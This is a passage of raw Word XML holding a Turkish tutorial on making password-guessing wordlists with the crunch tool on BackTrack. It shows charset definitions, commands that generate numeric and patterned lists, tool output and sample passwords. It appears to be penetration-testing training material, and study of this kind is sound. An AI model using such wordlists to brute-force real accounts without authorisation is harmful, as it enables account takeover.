              <w:t xml:space="preserve">hex-lower = [0123456789abcdef] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F29ED93" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">hex-upper = [0123456789ABCDEF] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="268BDFDE" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">numeric = [0123456789] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F181BB7" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">numeric-space = [0123456789 ] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AEC340A" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">symbols14 = [!@#$%^&amp;*()-_+=] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12954771" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">symbols14-space = [!@#$%^&amp;*()-_+= ] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03E26B6F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">symbols-all = [!@#$%^&amp;*()-_+=~`[]{}|\:;"'&lt;&gt;,.?/] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20402957" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">symbols-all-space = [!@#$%^&amp;*()-_+=~`[]{}|\:;"'&lt;&gt;,.?/ ] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="587EA1EE" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">ualpha = [ABCDEFGHIJKLMNOPQRSTUVWXYZ] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D171190" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">ualpha-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ ] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49097C95" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">ualpha-numeric = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BFD2D9C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>ualpha-numeric-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ACB661C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2EA16BFD" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01B89A49" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Yalnızca rakamlardan oluşan minimum 1, maksimum 8 karakterli </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rakamlar.txt </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>isimli wordlist oluşturma;</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w14:paraId="426175E8" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2203A00A" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">root@bt:/pentest/passwords/crunch# ./crunch 1 8 -f charset.lst numeric -o rakamlar.txt </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="001F57FC" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Crunch will now generate the following amount of data: 987654320 bytes </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D7F1971" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">941 MB </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FFFD50D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">0 GB </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="349D2326" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">0 TB </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B5A30F7" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">0 PB </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E152423" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Crunch will now generate the following number of lines: 111111110 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C18133B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">25% </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32A680F9" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">53% </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38AE8F53" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">76% </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BBD25D7" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>100%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2FF52617" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AC30DE7" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Burada </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-f </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">parametresi charset değerini vermek için, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-o</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> parametresi ise output(çıktı) dosyasını belirtmek için kullanılmıştır. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F9570B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Aynı işlem şu komutla da yapılabilir;</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w14:paraId="2AC66D53" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="138D3211" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>root@bt:/pentest/passwords/crunch# ./crunch 1 8 1234567890 numeric -o rakamlar.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="195CD701" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19B110A4" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D81DCC" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Aşağıda verilen senaryoya göre wordlist oluşturulacaktır; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FBFA1E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.Şifrenin ilk 4 karakteri 1453 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB73707" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.Şifre 10 karakterli </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C6D120" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.Şifrenin son iki karakteri ab </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07517A57" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.Geri kalan kısımları ise büyük harflerden oluşmaktadır(o halde ","(virgül) işareti kullanılacaktır).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCF1A8B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.Çıktı ozel.txt dosyasına yazdırılacaktır.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w14:paraId="04316A2C" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="333A3684" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">root@bt:/pentest/passwords/crunch# ./crunch 10 10 -t 1453,,,,ab -o ozel.txt </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B4A2EA2" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Crunch will now generate the following amount of data: 5026736 bytes </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47EBDE09" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">4 MB </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EB1C94D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">0 GB </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45845422" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">0 TB </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="009C68EF" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">0 PB </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B723E5E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Crunch will now generate the following number of lines: 456976 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38CF4FB3" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>100%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76C2D793" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BD50815" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Oluşturulan parolaların bir kısmı aşağıda gösterilmiştir.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w14:paraId="2671E368" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="26A3D3D7" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>root@bt:/pentest/passwords/crunch# head ozel.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76029A25" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5CE082BD" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">1453AAAAab </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C046BE5" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
